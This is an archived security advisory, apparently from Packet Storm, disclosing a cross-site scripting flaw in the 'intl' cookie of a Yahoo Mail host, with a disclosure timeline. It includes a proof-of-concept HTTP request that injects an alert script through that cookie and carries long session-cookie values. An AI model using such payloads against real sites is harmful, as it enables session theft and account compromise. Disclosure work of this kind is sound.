exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Yahoo intl Cross Site Scripting

Yahoo intl Cross Site Scripting
Posted Mar 9, 2014
Authored by Stefan Schurtz

The cookie intl parameter on de-mg42.mail.yahoo.com suffered from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 8bc6ea197fed8679d548461f2f3ddbf74dcf43a82a7cb8a447d4c145debd8a70

Yahoo intl Cross Site Scripting

Change Mirror Download

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Here is the my last advisory which I've reported in 2013 to the Yahoo
Bug Bounty Program. And again...the same story for this report as for my
others :-/

If you're interested, you can read it here:

http://darksecurity.de/index.php?/259-Yahoo-Bug-Bounty-Program-Vulnerability-1-XSS-on-ads.yahoo.com.html
http://darksecurity.de/index.php?/254-Yahoo-Bug-Bounty-Program-Vulnerability-2-Open-Redirect.html

Advisory: Yahoo Bug Bounty Program Vulnerability #3
XSS on de-mg42.mail.yahoo.com
Advisory ID: SSCHADV2013-YahooBB-002
Author: Stefan Schurtz
Affected Software: Successfully tested on de-mg42.mail.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing

==========================
Vulnerability Description
==========================

The 'intl'-Paramter on "https://de-mg42.mail.yahoo.com/" is prone to a
Cross-site Scripting vulnerability

==========================
PoC-Exploit
==========================

GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr

Host: de-mg42.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: YM.SREQs.schurtz=1;
YM.NEO_114841791630661482=width=1920&height=874; B=aj6vf6l8j20rv&b=4&
d=itbFpMNpYFMz7rPwe5JFum_ghxk-&s=i8&i=lvGlArFYMBIJ47eKw1fV;
RMBX=aj6vf6l8j20rv&b=3&s=0k&t=59; V=v=0.90&cc=0&m=0;
POPUPCHECK=1387130698530; adx=c322590@1386248182@1;
T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMT&a=QAE&
sk=DAA8V8EU20nhMO&ks=EAAl0SH4Wfzh6QOSww.4WR97g--~E&d=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREF
LVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0a
DdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFzYwF3bAF6egFic2xxU0JBN0U-;
F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7SqUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw-
&b=_pW9; PH=l=de-DE&i=de&fn=K2_4Upj6Mg1KYq4D9FKN;
SSL=v=1&s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5X5gJjBMR671vlpoBasj8HY6cXSNbA--&
kv=0; ywadp100034076556=3167627385;
fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa|
ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT;
ywadp1000357943879=4084605029;
fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHoAVDq|fvis1000357943879=
|8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780; AO=o=0;
YLS=v=1&p=1&n=0; ucs=bnas=0&eup=1;
_br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; Y=v=1&n=d7kp7cfrj6gcm&l=i.i27khjp/o
&p=m2evvde012000000&iz=&r=sd&lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e;
U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k-&
ux=u2JrSB&un=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3;
YM=v=2&u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA--&d=&f=AAA&t=3bKrSB&s=55nr;
DK=v=2&p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x
Connection: keep-alive

==========================
Disclosure Timeline
==========================

15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Securiy Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response@Yahoo) // last
contact

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa78MACgkQg3svV2LcbMA5hgCgi0sk2j/n8YAMLvQ4Nk3DMy9M
YrwAnAh2YEiFU76e8UU+RVsI9K0zkz35
=DnNI
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close